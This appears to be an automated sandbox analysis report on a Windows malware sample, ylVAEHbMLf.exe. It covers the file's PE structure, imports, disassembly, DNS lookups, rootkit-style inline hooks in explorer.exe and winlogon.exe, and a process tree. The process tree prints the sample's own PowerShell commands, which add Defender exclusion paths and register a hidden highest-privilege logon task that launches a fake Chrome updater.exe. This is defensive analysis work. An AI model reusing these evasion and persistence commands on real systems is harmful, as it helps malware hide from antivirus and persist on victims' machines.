                                          SHA1:31E6AE9106F0A00A0D42DB71D3331CC95C8A62A8
                                          SHA-256:3E9BB35C7D7A3586EDBC56F7FB8BA29F5E46E34A359FDE5814D9F4FE592B5E63
                                          SHA-512:34CB298210140610E0CAAB3D41AFC3F37E1295A7CC9BE88BA0D74DC4939798316142C309E27389A160521DCEFAEA5C5B37C130297B34CDCA06632B4525C25545
                                          Malicious:false
                                          Preview:ElfChnk.................U.......U....................\h......................................................................Mc....................s...h...............N...=...................................................N...............................................w.......4.......................-...................................[...........).......M...R...:...........................................................&...................................................................................**......U.......5.b............Wt.&........Wt...wX..9Ck?5.?.......A..3...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....\...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):76864
                                          Entropy (8bit):4.379340278128919
                                          Encrypted:false
                                          SSDEEP:384:fFRc3EFRc3EAlo3iUr+hHhBYceD+AwVfMNf5nf0lRlRXRLHeJvGAgXZIpURCOLi4:d38lnLmLQXHmtpJnqiNHpzoQpvnXet
                                          MD5:62E6754A55794985CB88475E0CCB509E
                                          SHA1:709022A63C7CE2D01994F22F0CD2DD79C6DB0531
                                          SHA-256:EDB9546522D6C06224BB9D7E7D44C5227F230EBC5757F429F60D59D0BD80510B
                                          SHA-512:4DB4FA8B7E922C6B10D3D6F4FD3B550876E9862D229E2770897B0D610A5535AFBB607ECF18031B55AD5C2218DB40975B3878899198DCDC22EFAED4FCEB897F35
                                          Malicious:false
                                          Preview:ElfChnk.................m.......r...................};.t......................................................................G....................s...h...............N...=...................................................N...............................................w.......0.......................E...................................W...........).......M...3...:...........................................................................................................................&...................**......m.......5.b............i.e&........i.e.t.Q...H.C.A;.......A../...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....X...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                          Process:C:\Windows\System32\svchost.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):57248
                                          Entropy (8bit):3.8539726080902623
                                          Encrypted:false
                                          SSDEEP:1536:6Z9R4vZqxfHfI+BKheWSWzWUWP7WsJWoW+WLnCIpVe+6:s
                                          MD5:A378329B10461167D49006D4B13E924E
                                          SHA1:82964E5AF7A1B3D60AA10AA642C94E9A95290835
                                          SHA-256:2484C8381B929605988BC2E6FFA35A858A18846B978C85AF1A53F98F380D7482
                                          SHA-512:CCAC4B5C64A642786CC713FEE0F833BC935040482947F59657E4EDF3A1E7C7A2A8CE57DCAF7CA1FB775BA355402ADA306F2B390435B04D7E90F23CD5C024A894
                                          Malicious:false
                                          Preview:ElfChnk.................y...................@i..xr...a.....................................................................b/p]............................................=..........................................................................................................................._...............8...........................f...................M...c...........................n...............................................&.......................................................................**......y......................B.&........B...._j..d.:Ad........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
                                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                          Entropy (8bit):7.688779848966801
                                          TrID:
                                          • Win64 Executable (generic) (12005/4) 74.95%
                                          • Generic Win/DOS Executable (2004/3) 12.51%
                                          • DOS Executable Generic (2002/1) 12.50%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                          File name:ylVAEHbMLf.exe
                                          File size:5'980'672 bytes
                                          MD5:3fb477ee2214bf2d4ed7df2d23f159e8
                                          SHA1:836c3f3b4b8f02e495703767b6bf923c453dba36
                                          SHA256:508821549db3334cccd6d492e17b29343ea5d0bda03379188c083e8c2217c291
                                          SHA512:e45c0e45177a3bb56b3685aa52c7107d390b9f9519edb5e2bc475dc20cfad615def0786039583255ad178b9f6d0941a0166b43da7a9c90acefb55eb6b27634e4
                                          SSDEEP:98304:Q/PrJHt+UOW/6U0GEkZqBq+2fxF2FZrejHPTu+8:QnrRkU0CZqBna2FZrIHid
                                          TLSH:4E56DFCAF163056CD11C26BF98F9AE1ACD7BE51A0811EAE8732552F2D1134DCC4689FE
                                          File Content Preview:MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&.....>[................@..............................[......Y[...`... ............................
                                          Icon Hash:90cececece8e8eb0
                                          Entrypoint:0x1400014b0
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x140000000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                          Time Stamp:0x66F204D3 [Tue Sep 24 00:16:19 2024 UTC]
                                          TLS Callbacks:0x4000f030, 0x1, 0x4000f000, 0x1
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f7505c167603909b7180406402fef19e
                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov eax, dword ptr [005AFCE5h]
                                          mov dword ptr [eax], 00000001h
                                          call 00007F863134560Fh
                                          nop
                                          nop
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop dword ptr [eax]
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov eax, dword ptr [005AFCC5h]
                                          mov dword ptr [eax], 00000000h
                                          call 00007F86313455EFh
                                          nop
                                          nop
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop dword ptr [eax]
                                          dec eax
                                          sub esp, 28h
                                          call 00007F863135C6F4h
                                          dec eax
                                          test eax, eax
                                          sete al
                                          movzx eax, al
                                          neg eax
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          dec eax
                                          lea ecx, dword ptr [00000009h]
                                          jmp 00007F8631345929h
                                          nop dword ptr [eax+00h]
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          dec eax
                                          lea eax, dword ptr [005B4809h]
                                          dec eax
                                          lea edx, dword ptr [eax+21h]
                                          mov byte ptr [eax], 00000000h
                                          dec eax
                                          add eax, 01h
                                          dec eax
                                          cmp eax, edx
                                          jne 00007F8631345946h
                                          ret
                                          dec eax
                                          lea eax, dword ptr [005B47B1h]
                                          dec eax
                                          lea edx, dword ptr [eax+18h]
                                          mov word ptr [eax], 0000h
                                          dec eax
                                          add eax, 02h
                                          dec eax
                                          cmp eax, edx
                                          jne 00007F8631345944h
                                          ret
                                          dec eax
                                          lea eax, dword ptr [005B4777h]
                                          dec eax
                                          lea edx, dword ptr [eax+14h]
                                          mov word ptr [eax], 0000h
                                          dec eax
                                          add eax, 02h
                                          dec eax
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x5b70000xa34.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x5ba0000x6b8.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5b20000x1170.pdata
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x5bb0000x330.reloc
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x5b07a00x28.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x5b728c0x250.idata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x194400x19600bf281938f7213b62bf17c20e58c71e9eFalse0.47222329125615764data6.168467606725369IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .data0x1b0000x592ce00x592e0011b96fd93c092a1e0029d507be396df2unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rdata0x5ae0000x3a100x3c00faa3d550e264bcf38646204c1b2ad6ecFalse0.35279947916666665OpenPGP Secret Key5.040707085037882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .pdata0x5b20000x11700x1200a9545924f7c8d281db3593783cb2e4efFalse0.466796875data5.102637887607491IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .xdata0x5b40000xf080x100012c0437a9eef7054b705eb0af90a1d04False0.243896484375data4.029627623925964IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .bss0x5b50000x1c400x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata0x5b70000xa340xc00bc194b5beaec5996a339d475fc5318c4False0.3030598958333333data3.813179986422126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .CRT0x5b80000x600x200808e8e5762727cbde45d2a0e66d5c313False0.06640625data0.26234430731160896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .tls0x5b90000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x5ba0000x6b80x8008ea36ad049e1f1d71fd364cf117e1333False0.38818359375data4.2150416021001895IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .reloc0x5bb0000x3300x4003f6681f0f5a661ed3b45235b695a74e6False0.5712890625data4.765082104358313IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_VERSION0x5ba0a00x2f0SysEx File - IDPEnglishUnited States0.449468085106383
                                          RT_MANIFEST0x5ba3900x325XML 1.0 document, ASCII textEnglishUnited States0.506832298136646
                                          DLLImport
                                          KERNEL32.dllCloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentThreadId, GetLastError, GetStartupInfoA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, RaiseException, ReleaseSemaphore, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, VirtualProtect, VirtualQuery, WaitForSingleObject, WideCharToMultiByte
                                          msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, fputc, fputs, fputwc, free, fwprintf, fwrite, localeconv, malloc, memcpy, memset, realloc, signal, strcmp, strerror, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                          Oct 8, 2024 00:27:05.900607109 CEST1.1.1.1192.168.2.40xb41fNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                          Oct 8, 2024 00:27:05.900607109 CEST1.1.1.1192.168.2.40xb41fNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                          Oct 8, 2024 00:27:18.337925911 CEST1.1.1.1192.168.2.40x9195No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                          Oct 8, 2024 00:27:18.337925911 CEST1.1.1.1192.168.2.40x9195No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false

                                          Code Manipulations

                                          Function NameHook TypeActive in Processes
                                          ZwEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                          NtQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                          ZwResumeThreadINLINEexplorer.exe, winlogon.exe
                                          NtDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                          ZwDeviceIoControlFileINLINEexplorer.exe, winlogon.exe
                                          NtEnumerateKeyINLINEexplorer.exe, winlogon.exe
                                          NtQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                          ZwEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                          ZwQuerySystemInformationINLINEexplorer.exe, winlogon.exe
                                          NtResumeThreadINLINEexplorer.exe, winlogon.exe
                                          RtlGetNativeSystemInformationINLINEexplorer.exe, winlogon.exe
                                          NtQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                          NtEnumerateValueKeyINLINEexplorer.exe, winlogon.exe
                                          ZwQueryDirectoryFileExINLINEexplorer.exe, winlogon.exe
                                          ZwQueryDirectoryFileINLINEexplorer.exe, winlogon.exe
                                          Function NameHook TypeNew Data
                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                          Function NameHook TypeNew Data
                                          ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                          NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                          NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                          ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                          RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                          NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                          ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                          ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                          Click to jump to process

                                          Click to jump to process

                                          Click to dive into process behavior distribution

                                          Click to jump to process

                                          Target ID:0
                                          Start time:18:26:47
                                          Start date:07/10/2024
                                          Path:C:\Users\user\Desktop\ylVAEHbMLf.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\ylVAEHbMLf.exe"
                                          Imagebase:0x7ff6a0400000
                                          File size:5'980'672 bytes
                                          MD5 hash:3FB477EE2214BF2D4ED7DF2D23F159E8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:low
                                          Has exited:true

                                          Target ID:1
                                          Start time:18:26:47
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:2
                                          Start time:18:26:47
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:18:26:51
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\dialer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\dialer.exe
                                          Imagebase:0x7ff609870000
                                          File size:39'936 bytes
                                          MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:true

                                          Target ID:5
                                          Start time:18:26:51
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
                                          Imagebase:0x7ff788560000
                                          File size:452'608 bytes
                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:18:26:51
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:18:26:51
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\winlogon.exe
                                          Wow64 process (32bit):false
                                          Commandline:winlogon.exe
                                          Imagebase:0x7ff7cd660000
                                          File size:906'240 bytes
                                          MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:8
                                          Start time:18:26:52
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\lsass.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\lsass.exe
                                          Imagebase:0x7ff7a2ae0000
                                          File size:59'456 bytes
                                          MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:9
                                          Start time:18:26:53
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:10
                                          Start time:18:26:53
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\dwm.exe
                                          Wow64 process (32bit):false
                                          Commandline:"dwm.exe"
                                          Imagebase:0x7ff74e710000
                                          File size:94'720 bytes
                                          MD5 hash:5C27608411832C5B39BA04E33D53536C
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate
                                          Has exited:false

                                          Target ID:11
                                          Start time:18:26:56
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:false

                                          Target ID:12
                                          Start time:18:26:56
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:13
                                          Start time:18:26:56
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:14
                                          Start time:18:26:57
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:15
                                          Start time:18:26:57
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_PersistenceViaHiddenTask, Description: Yara detected PersistenceViaHiddenTask, Source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                          Has exited:false

                                          Target ID:16
                                          Start time:18:26:58
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:17
                                          Start time:18:26:59
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:18
                                          Start time:18:27:00
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                          Imagebase:0x7ff6eef20000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:20
                                          Start time:18:27:01
                                          Start date:07/10/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff7699e0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:true

                                          Target ID:21
                                          Start time:18:27:01
                                          Start date:07/10/2024
                                          Path:C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe
                                          Imagebase:0x7ff70f330000
                                          File size:5'980'672 bytes
                                          MD5 hash:3FB477EE2214BF2D4ED7DF2D23F159E8
                                          Has elevated privileges:true
